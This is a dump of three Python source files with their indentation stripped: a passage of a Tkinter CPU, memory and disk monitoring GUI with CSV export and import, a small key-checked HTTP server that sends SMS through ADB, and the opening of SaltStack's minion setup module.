[('Notebook.tab', {'sticky': 'nswe', 'children':
[('Notebook.padding', {'side': 'top', 'sticky': 'nswe', 'children':
# [('Notebook.focus', {'side': 'top', 'sticky': 'nswe', 'children':
[('Notebook.label', {
'side': 'top', 'sticky': ''})],
# })],
})],
})]
)
s.configure("TNotebook", tabposition='n')
# make tabs
tab_control = ttk.Notebook(window)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab4 = ttk.Frame(tab_control)
tab_control.add(tab1, text="Current")
tab_control.add(tab2, text="Historical")
tab_control.add(tab3, text="Export CSV")
tab_control.add(tab4, text="Import CSV")
tab_control.pack(expand=1, fill="both")
cpu_graph = graph_util.AnimatedBaseGraph(tab1, 60, "CPU")
mem_graph = graph_util.AnimatedBaseGraph(tab1, 60, "MEMORY")
disk_graph = graph_util.AnimatedBaseGraph(tab1, 60, "DISK")
# frame1 = ttk.Frame(tab1)
# frame2 = ttk.Frame(tab1)
# frame3 = ttk.Frame(tab1)
# new_data = cache.get_cache()[-1]
cpu_graph.pack(fill="both", expand=1)
# T = tk.Label(tab1, text = "MEMORY")
# T.pack()
mem_graph.pack(fill="both", expand=1)
# T = tk.Label(tab1, text = "DISK")
# T.pack()
disk_graph.pack(fill="both", expand=1)
######
'''TAB 2'''
######
# Add Calendar
top = tk.Frame(tab2)
bottom = tk.Frame(tab2)
T = tk.Label(tab2, text="From:")
T.pack(pady=10)
cal_tab2_var = tk.StringVar()
cal_tab2_var.set(datetime.now().strftime("%d/%m/%y"))
cal_tab2 = Calendar(tab2, textvariable=cal_tab2_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal_tab2_var.set(datetime.now().strftime("%Y-%m-%d"))
cal_tab2.pack()
top.pack()
clicked_tab2 = tk.StringVar()
clicked_tab2.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop = tk.OptionMenu(tab2, clicked_tab2, *options)
drop.pack(in_=top, side=tk.LEFT)
clicked1_tab2 = tk.StringVar()
clicked1_tab2.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop1 = tk.OptionMenu(tab2, clicked1_tab2, *options)
drop1.pack(in_=top, side=tk.RIGHT)
T = tk.Label(tab2, text="To:")
T.pack(pady=10)
cal1_tab2_var = tk.StringVar()
cal1_tab2_var.set(datetime.now().strftime("%d/%m/%y"))
cal1_tab2 = Calendar(tab2, textvariable=cal1_tab2_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal1_tab2_var.set(datetime.now().strftime("%Y-%m-%d"))
cal1_tab2.pack()
bottom.pack()
clicked2_tab2 = tk.StringVar()
clicked2_tab2.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop2 = tk.OptionMenu(tab2, clicked2_tab2, *options)
drop2.pack(in_=bottom, side=tk.LEFT)
clicked3_tab2 = tk.StringVar()
clicked3_tab2.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop3 = tk.OptionMenu(tab2, clicked3_tab2, *options)
drop3.pack(in_=bottom, side=tk.RIGHT)
def grad_date():
a = clicked_tab2.get()
if a == "Hour":
a = "0"
b = clicked1_tab2.get()
if b == "Minutes":
b = "0"
a1 = clicked2_tab2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3_tab2.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal_tab2.get_date() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1_tab2.get_date() + f' {a1}:{b1}:59', '%Y-%m-%d %H:%M:%S')
data = database_util.get_data_from_date(date1, date2)
if len(data) == 0:
data = [[cal_tab2.get_date() + f' {a}:{b}',0,1,0,1,0]]
# create 3 subplots for cpu, memory, disk
fig, axs = plt.subplots(3, dpi=100, figsize=(6, 5))
fig.tight_layout(pad=4)
axs[0].set_title("CPU")
axs[1].set_title("MEMORY")
axs[2].set_title("DISK")
axs[0].set_ylabel("Percent")
axs[1].set_ylabel("Percent")
axs[2].set_ylabel("Percent")
axs[0].set_xlabel("Time")
x_data = [date1 + timedelta(minutes=i)
for i in range(int((date2-date1).total_seconds()//60) + 1)]
x_from_the_dataa = [datetime.strptime(
i[0], "%Y-%m-%d %H:%M") for i in data]
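# Build per-minute y series aligned with x_data: main_list pads the
# gap before the first sample with None, main_list2 pads the gap
# after the last sample, and the loop below inserts None for any
# missing minutes between samples. Matplotlib breaks the line at
# None values, so gaps in the recorded data show up as gaps in the
# plot.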
main_list = [None]*int((x_from_the_dataa[0]-date1).total_seconds()//60)
main_list2 = [None]*int((date2-x_from_the_dataa[-1]).total_seconds()//60)
y_data_cpu,y_data_mem,y_data_disk = main_list[:],main_list[:],main_list[:]
yhaha_cpu = [float(ts[1]) for ts in data]
yhaha_mem = [(float(ts[3])/float(ts[2]))*100 for ts in data]
yhaha_disk = [(float(ts[5])/float(ts[4]))*100 for ts in data]
for i in range(len(x_from_the_dataa)-1):
y_data_cpu.append(yhaha_cpu[i])
y_data_mem.append(yhaha_mem[i])
y_data_disk.append(yhaha_disk[i])
temp = [None]*(int((x_from_the_dataa[i+1]-x_from_the_dataa[i]).total_seconds()//60)-1)
y_data_cpu.extend(temp)
y_data_mem.extend(temp)
y_data_disk.extend(temp)
y_data_cpu.extend([yhaha_cpu[-1]]+main_list2)
y_data_mem.extend([yhaha_mem[-1]]+main_list2)
y_data_disk.extend([yhaha_disk[-1]]+main_list2)
axs[0].set_ylim(0, 101)
axs[1].set_ylim(0, 101)
axs[2].set_ylim(0, 101)
axs[0].set_xlim(date1, date2)
axs[1].set_xlim(date1, date2)
axs[2].set_xlim(date1, date2)
axs[0].plot(x_data, y_data_cpu)
axs[1].plot(x_data, y_data_mem)
axs[2].plot(x_data, y_data_disk)
plt.show()
def switch_tab2(*args):
a = clicked_tab2.get()
if a == "Hour":
a = "0"
b = clicked1_tab2.get()
if b == "Minutes":
b = "0"
a1 = clicked2_tab2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3_tab2.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal_tab2.get_date() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1_tab2.get_date() + f' {a1}:{b1}:00', '%Y-%m-%d %H:%M:%S')
if date1 >= date2:
button2.config(state='disabled')
else:
button2.config(state='normal')
clicked_tab2.trace("w", switch_tab2)
clicked1_tab2.trace("w", switch_tab2)
clicked2_tab2.trace("w", switch_tab2)
clicked3_tab2.trace("w", switch_tab2)
cal_tab2_var.trace("w", switch_tab2)
cal1_tab2_var.trace("w", switch_tab2)
# Add Button and Label
button2 = tk.Button(tab2, text="Get Data",
command=grad_date)
button2.pack(pady=20)
######
'''TAB 3'''
######
top = tk.Frame(tab3)
bottom = tk.Frame(tab3)
T = tk.Label(tab3, text="From:")
T.pack(pady=10)
cal_var = tk.StringVar()
cal_var.set(datetime.now().strftime("%d/%m/%y"))
cal = Calendar(tab3, textvariable=cal_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal_var.set(datetime.now().strftime("%Y-%m-%d"))
cal.pack()
top.pack()
clicked = tk.StringVar()
clicked.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop = tk.OptionMenu(tab3, clicked, *options)
drop.pack(in_=top, side=tk.LEFT)
clicked1 = tk.StringVar()
clicked1.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop1 = tk.OptionMenu(tab3, clicked1, *options)
drop1.pack(in_=top, side=tk.RIGHT)
T = tk.Label(tab3, text="To:")
T.pack(pady=10)
cal1_var = tk.StringVar()
cal1_var.set(datetime.now().strftime("%d/%m/%y"))
cal1 = Calendar(tab3, textvariable=cal1_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal1_var.set(datetime.now().strftime("%Y-%m-%d"))
cal1.pack()
bottom.pack()
clicked2 = tk.StringVar()
clicked2.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop2 = tk.OptionMenu(tab3, clicked2, *options)
drop2.pack(in_=bottom, side=tk.LEFT)
clicked3 = tk.StringVar()
clicked3.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop3 = tk.OptionMenu(tab3, clicked3, *options)
drop3.pack(in_=bottom, side=tk.RIGHT)
def save_file_date():
a = clicked.get()
if a == "Hour":
a = "0"
b = clicked1.get()
if b == "Minutes":
b = "0"
a1 = clicked2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal.get_date() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1.get_date() + f' {a1}:{b1}:59', '%Y-%m-%d %H:%M:%S')
data = database_util.get_data_from_date(date1, date2)
files = [('', '*.csv')]
f = filedialog.asksaveasfile(filetypes=files, defaultextension=files)
if f is None: # asksaveasfile return `None` if dialog closed with "cancel".
return
a = f.name
f.close()
with open(a, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(["TIME", "CPU", "MEMORY_TOTAL_BYTES",
"MEMORY_USED_BYTES", "DISK_TOTAL_BYTES", "DISK_USED_BYTES"])
writer.writerows(data)
def save_file_all():
files = [('', '*.csv')]
f = filedialog.asksaveasfile(filetypes=files, defaultextension=files)
if f is None:
return
a = f.name
f.close()
with open(a, 'w', newline='') as f:
with open('data1.csv', 'r+', newline='') as f1:
reader = csv.reader(f1)
writer = csv.writer(f)
writer.writerow(["TIME", "CPU", "MEMORY_TOTAL_BYTES",
"MEMORY_USED_BYTES", "DISK_TOTAL_BYTES", "DISK_USED_BYTES"])
writer.writerows(list(reader))
def switch(*args):
a = clicked.get()
if a == "Hour":
a = "0"
b = clicked1.get()
if b == "Minutes":
b = "0"
a1 = clicked2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal_var.get() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1.get_date() + f' {a1}:{b1}:00', '%Y-%m-%d %H:%M:%S')
if date1 >= date2:
button1.config(state='disabled')
else:
button1.config(state='normal')
clicked.trace("w", switch)
clicked1.trace("w", switch)
clicked2.trace("w", switch)
clicked3.trace("w", switch)
cal_var.trace("w", switch)
cal1_var.trace("w", switch)
# Add Button and Label
button1 = tk.Button(tab3, text="Get data between dates",
command=save_file_date)
button1.pack(pady=10)
tk.Button(tab3, text="Get all data", command=save_file_all).pack()
######
'''TAB 4'''
######
def upload_data():
window.update()
filename = filedialog.askopenfile(title="Select a File",
filetypes=[("CSV files",
"*.csv")])
if filename is None:
return
f = filename.name
filename.close()
with open(f, 'r', newline='') as f:
reader = csv.reader(f)
data = list(reader)[1:]
fig, axs = plt.subplots(3, dpi=100, figsize=(6, 5))
fig.tight_layout(pad=4)
axs[0].set_title("CPU")
axs[1].set_title("MEMORY")
axs[2].set_title("DISK")
axs[0].set_ylabel("Percent")
axs[1].set_ylabel("Percent")
axs[2].set_ylabel("Percent")
axs[0].set_xlabel("Time")
date_list = [i[0] for i in data]
for i in range(len(date_list)):
date_list[i] = datetime.strptime(
date_list[i], '%Y-%m-%d %H:%M')
date1 = min(date_list)
date2 = max(date_list)
x_data = [date1 + timedelta(minutes=i)
for i in range(int((date2-date1).total_seconds()//60) + 1)]
x_from_the_dataa = [datetime.strptime(
i[0], "%Y-%m-%d %H:%M") for i in data]
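# Same gap-filling approach as the Historical tab: pad missing
# minutes with None so matplotlib leaves gaps in the plotted line.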
main_list = [None]*int((x_from_the_dataa[0]-date1).total_seconds()//60)
main_list2 = [None]*int((date2-x_from_the_dataa[-1]).total_seconds()//60)
y_data_cpu,y_data_mem,y_data_disk = main_list[:],main_list[:],main_list[:]
yhaha_cpu = [float(ts[1]) for ts in data]
yhaha_mem = [(float(ts[3])/float(ts[2]))*100 for ts in data]
yhaha_disk = [(float(ts[5])/float(ts[4]))*100 for ts in data]
for i in range(len(x_from_the_dataa)-1):
y_data_cpu.append(yhaha_cpu[i])
y_data_mem.append(yhaha_mem[i])
y_data_disk.append(yhaha_disk[i])
temp = [None]*(int((x_from_the_dataa[i+1]-x_from_the_dataa[i]).total_seconds()//60)-1)
y_data_cpu.extend(temp)
y_data_mem.extend(temp)
y_data_disk.extend(temp)
y_data_cpu.extend([yhaha_cpu[-1]]+main_list2)
y_data_mem.extend([yhaha_mem[-1]]+main_list2)
y_data_disk.extend([yhaha_disk[-1]]+main_list2)
axs[0].set_ylim(0, 101)
axs[1].set_ylim(0, 101)
axs[2].set_ylim(0, 101)
axs[0].set_xlim(date1, date2)
axs[1].set_xlim(date1, date2)
axs[2].set_xlim(date1, date2)
axs[0].plot(x_data, y_data_cpu)
axs[1].plot(x_data, y_data_mem)
axs[2].plot(x_data, y_data_disk)
plt.show()
def change_state(*args):
with open("bg_run.txt", 'w') as f:
f.write(str(Checkbutton1.get()))
Checkbutton1 = tk.IntVar()
with open('bg_run.txt', 'r') as f:
Checkbutton1.set(int(f.read()))
Checkbutton1.trace("w", change_state)
Import = tk.LabelFrame(tab4, relief='flat')
Settings = tk.LabelFrame(tab4, relief='flat')
tk.Label(tab4, text="Upload data from file", font=(
'Arial', 18)).pack(in_=Import, pady=10)
tk.Button(tab4, text="Upload data", command=upload_data).pack(
in_=Import, pady=10)
tk.Label(tab4, text="Settings", font=(
'Arial', 18)).pack(in_=Settings, pady=10)
tk.Checkbutton(tab4, text="Keep running in Background?",
variable=Checkbutton1,
onvalue=1,
offvalue=0,
height=1,
width=25).pack(in_=Settings, pady=10)
Import.grid(row=0, column=0, sticky="nsew", pady=10)
Settings.grid(row=1, column=0, sticky="nsew", pady=10)
tab4.grid_rowconfigure(0, minsize=tab1.winfo_height()//2)
tab4.grid_columnconfigure(0, minsize=tab1.winfo_width())
return window, cpu_graph, mem_graph, disk_graph
def poll():
global thread_death, run_in_bg
while True:
with open("bg_run.txt", 'r') as f:
bg_run = int(f.read())
if (thread_death and not(bg_run)) or not(run_in_bg):
print("\nShutting down...")
break
# update graphs with new data
new_data = data_util.get_all_parsed_data()
cache.update_data(new_data)
time.sleep(0.9)
return
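# thread_death is set by on_closing() when the GUI window is closed;
# run_in_bg stays True while background collection should continue.
# Because poll() re-reads bg_run.txt every cycle, closing the window
# with "Keep running in Background?" enabled keeps sampling until the
# user presses Enter in the console, which clears run_in_bg.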
thread_death = False
run_in_bg = True
def main():
try:
t1 = threading.Thread(target=poll)
t1.start()
window, cpu_graph, mem_graph, disk_graph = setup_window()
cpu_graph.animate()
mem_graph.animate()
disk_graph.animate()
def on_closing():
global thread_death, run_in_bg
thread_death = True
window.destroy()
with open("bg_run.txt", 'r') as f:
bg_run = int(f.read())
if bg_run == 1:
nu = input("Press enter to exit")
run_in_bg = False
window.protocol("WM_DELETE_WINDOW", on_closing)
window.mainloop()
except KeyboardInterrupt:
print("\nShutting down...")
exit()
if __name__ == "__main__":
main()
|
Server.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import cgi
import sys
import threading
import re
from Adb_Handler import Adb_Handler as AdbHandler
class Server(BaseHTTPRequestHandler):
verbose = False
key = ''
deviceId = ''
adbHandler = AdbHandler
def start(self, ip, port, key, deviceId, verbose):
self.verbose = verbose
self.key = key
self.deviceId = deviceId
print('Starting server...')
server_address = (ip, port)
self.httpd = HTTPServer(server_address, Server)
thread = threading.Thread(target = self.httpd.serve_forever)
thread.daemon = True
thread.start()
print('Server started on: ' + ip + ':' + str(port))
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
print('Server stopped')
def do_POST(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
print(self.headers['content-type'])
ctype, pdict = cgi.parse_header(self.headers['content-type'])
if ctype == 'application/x-www-form-urlencoded':
length = int(self.headers['content-length'])
postVars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postVars = {}
if bytes('key', 'utf8') in postVars:
try:
key = postVars[bytes('key', 'utf8')][0].decode('utf-8')
msg = postVars[bytes('msg', 'utf8')][0].decode('utf-8')
rec = postVars[bytes('rec', 'utf8')][0].decode('utf-8')
except Exception:
message = '{ "status":"error_decoding_params" }'
self.wfile.write(bytes(message, 'utf8'))
return
else:
message = '{ "status":"no_auth" }'
self.wfile.write(bytes(message, 'utf8'))
return
if key == self.key:
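# Receiver must look like an international number: a leading '+',
# a 1-3 digit country code, then a 10-11 digit subscriber number.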
rule = re.compile(r'(^\+[0-9]{1,3}[0-9]{10,11}$)')
if rule.search(rec):
if len(msg) == 0:
message = '{ "status":"EMPTY_MESSAGE" }'
elif len(msg) > 160:
message = '{ "status":"MESSAGE_EXCEEDS_160_CHAR_LIMIT" }'
else:
if (self.adbHandler.sendSms(AdbHandler, self.deviceId, rec, msg)):
message = '{ "status":"REQUEST_PROCESSED" }'
else:
message = '{ "status":"ERROR_PROCESSING_REQUEST" }'
else:
message = '{ "status":"INVALID_RECEIVER" }'
else:
message = '{ "status":"WRONG_AUTH" }'
self.wfile.write(bytes(message, 'utf8'))
if self.verbose:
print(postVars)
def log_message(self, format, *args):
if self.verbose:
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt._compat import ipaddress
from salt.utils.network import parse_host_port
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.transport.client
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.events
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
SaltMasterUnresolvableError
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
except SaltClientError:
retry_dns_count = opts.get('retry_dns_count', None)
if opts['retry_dns']:
while True:
if retry_dns_count is not None:
if retry_dns_count == 0:
raise SaltMasterUnresolvableError
retry_dns_count -= 1
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'],
attempt_connect=False)
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
'''
parse host:port values from opts['master'] and return valid:
master: ip address or hostname as a string
master_port: (optional) master returner port as integer
e.g.:
- master: 'localhost:1234' -> {'master': 'localhost', 'master_port': 1234}
- master: '127.0.0.1:1234' -> {'master': '127.0.0.1', 'master_port' :1234}
- master: '[::1]:1234' -> {'master': '::1', 'master_port': 1234}
- master: 'fe80::a00:27ff:fedc:ba98' -> {'master': 'fe80::a00:27ff:fedc:ba98'}
'''
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only':
ret['master'] = ipaddress.ip_address(opts['master'])
else:
host, port = parse_host_port(opts['master'])
ret = {'master': host}
if port:
ret.update({'master_port': port})
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedirs would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So let's check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
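# Illustrative usage of get_proc_dir() (a sketch; the cache path and ownership
# values below are examples, not defaults):
#   proc_dir = get_proc_dir('/var/cache/salt/minion', mode=0o700, uid=0, gid=0)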
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then it's a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
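# Illustrative call of load_args_and_kwargs() (assuming ``func`` is a loaded
# execution module function that accepts a keyword named ``key``):
#   args, kwargs = load_args_and_kwargs(
#       func, ['positional', {'__kwarg__': True, 'key': 'val'}])
#   # -> args == ['positional'], kwargs == {'key': 'val'}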
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save its result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string or list', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
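# Illustrative minion config for eval_master_func() (the module and function
# names are assumptions); the named function must return a hostname string or
# a list of hostnames:
#   master_type: func
#   master: my_master_module.get_master_address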
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
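# Illustrative return values of master_event(), derived from the mapping above:
#   master_event('connected')          -> '__master_connected'
#   master_event('alive', 'master1')   -> '__master_alive_master1'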
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
